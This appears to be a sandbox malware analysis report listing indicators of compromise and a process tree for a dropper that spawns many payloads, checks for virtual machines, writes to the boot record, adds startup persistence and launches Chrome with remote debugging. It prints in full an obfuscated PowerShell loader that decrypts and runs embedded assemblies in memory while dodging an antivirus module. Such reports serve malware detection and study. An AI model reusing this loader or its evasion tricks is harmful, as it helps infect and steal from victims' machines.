description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9198fa4ab8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9198fa4ab8.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3028 timeout.exe 5696 timeout.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6000 schtasks.exe 4568 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2012 ffa05200d7a741017eb476eef981b041.exe 2012 ffa05200d7a741017eb476eef981b041.exe 4852 skotes.exe 4852 skotes.exe 5092 f779cc9603.exe 5092 f779cc9603.exe 5092 f779cc9603.exe 5092 f779cc9603.exe 2064 Bjkm5hE.exe 2064 Bjkm5hE.exe 2064 Bjkm5hE.exe 2064 Bjkm5hE.exe 5096 Fe36XBk.exe 5096 Fe36XBk.exe 2416 powershell.exe 2416 powershell.exe 5084 ViGgA8C.exe 5084 ViGgA8C.exe 5092 powershell.exe 5092 powershell.exe 4288 powershell.exe 4288 powershell.exe 3020 skotes.exe 3020 skotes.exe 5080 DTQCxXZ.exe 5080 DTQCxXZ.exe 5080 DTQCxXZ.exe 5080 DTQCxXZ.exe 5084 ViGgA8C.exe 5084 ViGgA8C.exe 1732 d2YQIJa.exe 1732 d2YQIJa.exe 1732 d2YQIJa.exe 1732 d2YQIJa.exe 1732 d2YQIJa.exe 1732 d2YQIJa.exe 3744 sHN20me.exe 3744 sHN20me.exe 3744 sHN20me.exe 3744 sHN20me.exe 3744 sHN20me.exe 3744 sHN20me.exe 4844 spoDnGT.exe 4844 spoDnGT.exe 4844 spoDnGT.exe 4844 spoDnGT.exe 4844 spoDnGT.exe 4844 spoDnGT.exe 2428 Ta3ZyUR.exe 2428 Ta3ZyUR.exe 2428 Ta3ZyUR.exe 2428 Ta3ZyUR.exe 3144 qFqSpAp.exe 3144 qFqSpAp.exe 3144 qFqSpAp.exe 3144 qFqSpAp.exe 3708 m5UP2Yj.exe 3708 m5UP2Yj.exe 3252 jROrnzx.exe 3252 jROrnzx.exe 3252 jROrnzx.exe 3252 jROrnzx.exe 4384 7aencsM.exe 4384 7aencsM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 2416 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 5084 ViGgA8C.exe Token: SeDebugPrivilege 4288 powershell.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeShutdownPrivilege 3112 chrome.exe Token: SeCreatePagefilePrivilege 3112 chrome.exe Token: SeDebugPrivilege 5468 powershell.exe Token: SeDebugPrivilege 5132 TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Token: SeDebugPrivilege 5632 powershell.exe Token: SeDebugPrivilege 6080 powershell.exe Token: SeShutdownPrivilege 5340 chrome.exe Token: SeCreatePagefilePrivilege 5340 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2012 ffa05200d7a741017eb476eef981b041.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 3112 chrome.exe 2264 e40f8faca5.exe 2264 e40f8faca5.exe 2264 e40f8faca5.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5384 msedge.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe 5340 chrome.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2264 e40f8faca5.exe 2264 e40f8faca5.exe 2264 e40f8faca5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2012 wrote to memory of 4852 2012 ffa05200d7a741017eb476eef981b041.exe 85 PID 2012 wrote to memory of 4852 2012 ffa05200d7a741017eb476eef981b041.exe 85 PID 2012 wrote to memory of 4852 2012 ffa05200d7a741017eb476eef981b041.exe 85 PID 4852 wrote to memory of 3752 4852 skotes.exe 86 PID 4852 wrote to memory of 3752 4852 skotes.exe 86 PID 4852 wrote to memory of 3752 4852 skotes.exe 86 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 3752 wrote to memory of 5092 3752 f779cc9603.exe 87 PID 4852 wrote to memory of 1724 4852 skotes.exe 92 PID 4852 wrote to memory of 1724 4852 skotes.exe 92 PID 4852 wrote to memory of 1724 4852 skotes.exe 92 PID 4852 wrote to memory of 1016 4852 skotes.exe 93 PID 4852 wrote to memory of 1016 4852 skotes.exe 93 PID 4852 wrote to memory of 1016 4852 skotes.exe 93 PID 4852 wrote to memory of 4644 4852 skotes.exe 94 PID 4852 wrote to memory of 4644 4852 skotes.exe 94 PID 4852 wrote to memory of 4644 4852 skotes.exe 94 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4644 wrote to memory of 2064 4644 Bjkm5hE.exe 95 PID 4852 wrote to memory of 5096 4852 skotes.exe 98 PID 4852 wrote to memory of 5096 4852 skotes.exe 98 PID 4852 wrote to memory of 5096 4852 skotes.exe 98 PID 4852 wrote to memory of 2416 4852 skotes.exe 99 PID 4852 wrote to memory of 2416 4852 skotes.exe 99 PID 4852 wrote to memory of 2416 4852 skotes.exe 99 PID 4852 wrote to memory of 5084 4852 skotes.exe 101 PID 4852 wrote to memory of 5084 4852 skotes.exe 101 PID 4852 wrote to memory of 5084 4852 skotes.exe 101 PID 2416 wrote to memory of 780 2416 powershell.exe 103 PID 2416 wrote to memory of 780 2416 powershell.exe 103 PID 2416 wrote to memory of 780 2416 powershell.exe 103 PID 780 wrote to memory of 4056 780 cmd.exe 105 PID 780 wrote to memory of 4056 780 cmd.exe 105 PID 780 wrote to memory of 4056 780 cmd.exe 105 PID 780 wrote to memory of 5092 780 cmd.exe 106 PID 780 wrote to memory of 5092 780 cmd.exe 106 PID 780 wrote to memory of 5092 780 cmd.exe 106 PID 4852 wrote to memory of 5080 4852 skotes.exe 108 PID 4852 wrote to memory of 5080 4852 skotes.exe 108 PID 4852 wrote to memory of 5080 4852 skotes.exe 108 PID 5092 wrote to memory of 4288 5092 powershell.exe 109 PID 5092 wrote to memory of 4288 5092 powershell.exe 109 PID 5092 wrote to memory of 4288 5092 powershell.exe 109 PID 4852 wrote to memory of 5068 4852 skotes.exe 111 PID 4852 wrote to memory of 5068 4852 skotes.exe 111 PID 4852 wrote to memory of 5068 4852 skotes.exe 111 PID 4852 wrote to memory of 1732 4852 skotes.exe 112 PID 4852 wrote to memory of 1732 4852 skotes.exe 112 PID 4852 wrote to memory of 1732 4852 skotes.exe 112 PID 1724 wrote to memory of 4664 1724 13Z5sqy.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\ffa05200d7a741017eb476eef981b041.exe"C:\Users\Admin\AppData\Local\Temp\ffa05200d7a741017eb476eef981b041.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\1014060001\f779cc9603.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\f779cc9603.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\1014060001\f779cc9603.exe"C:\Users\Admin\AppData\Local\Temp\1014060001\f779cc9603.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 9564⤵
- Program crash
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4664
-
-
-
C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1016
-
-
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 9684⤵
- Program crash
PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:4056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5068 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:224
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4844
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 9764⤵
- Program crash
PID:4964
-
-
-
C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1083218001\qFqSpAp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3144
-
-
C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"C:\Users\Admin\AppData\Local\Temp\1084785001\jROrnzx.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 9684⤵
- Program crash
PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4384 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3112 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe56fccc40,0x7ffe56fccc4c,0x7ffe56fccc586⤵PID:1952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1660,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1768 /prefetch:26⤵PID:3708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1964,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2140 /prefetch:36⤵PID:4664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2488 /prefetch:86⤵PID:3180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3172 /prefetch:16⤵
- Uses browser remote debugging
PID:2320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:16⤵
- Uses browser remote debugging
PID:3680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4592 /prefetch:16⤵
- Uses browser remote debugging
PID:1304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4504,i,18380068957361190526,7649297083909683343,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:86⤵PID:224
-
-
